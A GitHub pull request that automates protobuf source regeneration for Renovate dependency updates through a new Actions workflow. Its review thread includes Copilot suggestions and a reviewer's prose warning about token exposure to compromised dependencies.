ci: automate protobuf source generation for Renovate updates#1920
ci: automate protobuf source generation for Renovate updates#1920zeitlinger wants to merge 4 commits intomainfrom
Conversation
Group protobuf-java and protoc into a single Renovate PR and add a workflow that regenerates protobuf sources when both deps are updated. Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
|
@roidelapluie — could you add |
Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
There was a problem hiding this comment.
Pull request overview
This PR adds automation to regenerate protobuf sources when Renovate updates protobuf dependencies, streamlining the update process by grouping protobuf-java and protoc updates together.
Changes:
- Groups protobuf-java and protoc in Renovate configuration to create a single PR for both updates
- Adds a GitHub Actions workflow that automatically regenerates protobuf sources when the
renovate/protobufbranch is updated - Simplifies the mise generate task by removing the
mise use --pin protoc@latestcommand (no longer needed since Renovate handles both updates)
Reviewed changes
Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| .github/workflows/generate-protobuf.yml | New workflow that triggers on renovate/protobuf branch to regenerate protobuf sources and commit them back to the PR |
| .github/renovate.json5 | Groups protobuf-java and protoc dependencies together with separateMajorMinor disabled |
| .github/renovate-tracked-deps.json | Adds the new generate-protobuf workflow to tracked dependencies for mise version updates |
| mise.toml | Simplifies generate task by removing mise use command and updating description |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| - name: Commit and push generated sources | ||
| run: | | ||
| git diff --quiet && exit 0 | ||
| UNEXPECTED=$(git diff --name-only | grep -v '\.java$' | grep -v '^mise\.toml$' || true) |
There was a problem hiding this comment.
The mise.toml file should not change during the generate step anymore since the mise use --pin protoc@latest command has been removed from the generate task. Including mise.toml in the list of acceptable changed files could mask unexpected modifications to this file. Consider removing | grep -v '^mise\.toml$' from this line to ensure only Java files are modified during generation.
There was a problem hiding this comment.
Accepted — removed the mise.toml exception from the unexpected files check.
| # TODO: switch to PROMBOT_GITHUB_TOKEN once it's added to this repo. | ||
| git config user.name "github-actions[bot]" | ||
| git config user.email "41898282+github-actions[bot]@users.noreply.github.com" | ||
| git add '*.java' mise.toml |
There was a problem hiding this comment.
Since the generate task no longer modifies mise.toml (the mise use --pin protoc@latest command was removed), there's no need to add mise.toml to the git commit. This line should only add the generated Java files: git add '*.java'
| git add '*.java' mise.toml | |
| git add '*.java' |
There was a problem hiding this comment.
Accepted — now only adding *.java to the commit.
Since the generate task no longer runs `mise use --pin protoc@latest`, mise.toml should not change during generation. Signed-off-by: Gregor Zeitlinger <gregor.zeitlinger@grafana.com>
| on: | ||
| push: | ||
| branches: | ||
| - "renovate/protobuf" |
There was a problem hiding this comment.
Note that a push for this from renovate could still theoretically contain untrusted code if the dependency being updated was compromised and a malicious version published.
If the update contained malicious code that tried to steal GITHUB_TOKEN (or whatever secret is used), it would able to perform arbitrary write operations on the repository, or whatever permissions that token had.
It's risky performing automated writes to the repository with elevated permissions in this context.
It's not something I've tried to do myself, but a safer approach could be to have this job only generate a Git patch for the changes as a build artifact, and then have another job/workflow take that artifact and apply it after applying some sanity checks (e.g. the diff only updates the expected files). Then any compromised code isn't able to actually execute with access to the secrets but the protobuf files can still be regenerated.
| fi | ||
| # Note: GITHUB_TOKEN pushes don't trigger CI re-runs. | ||
| # Close and reopen the PR to trigger CI after this commit. | ||
| # TODO: switch to PROMBOT_GITHUB_TOKEN once it's added to this repo. |
There was a problem hiding this comment.
If PROMBOT_GITHUB_TOKEN has permissions greater than contents: write (e.g. if it had admin access) then that might be even riskier than using GITHUB_TOKEN regardless of whether it can trigger CI or not.
Summary
protobuf-javaandprotocinto a single Renovate PR (separateMajorMinor: false)renovate/protobufbranch to regenerate protobuf sourcesmise use --pin protoc@latestfrom generate task (no longer needed with grouping)Known limitation
The workflow pushes with
GITHUB_TOKEN, which doesn't trigger CI re-runs. After the generated commit is pushed, close and reopen the PR to trigger CI.Follow-up: switch to
PROMBOT_GITHUB_TOKENso CI re-runs automatically.Test plan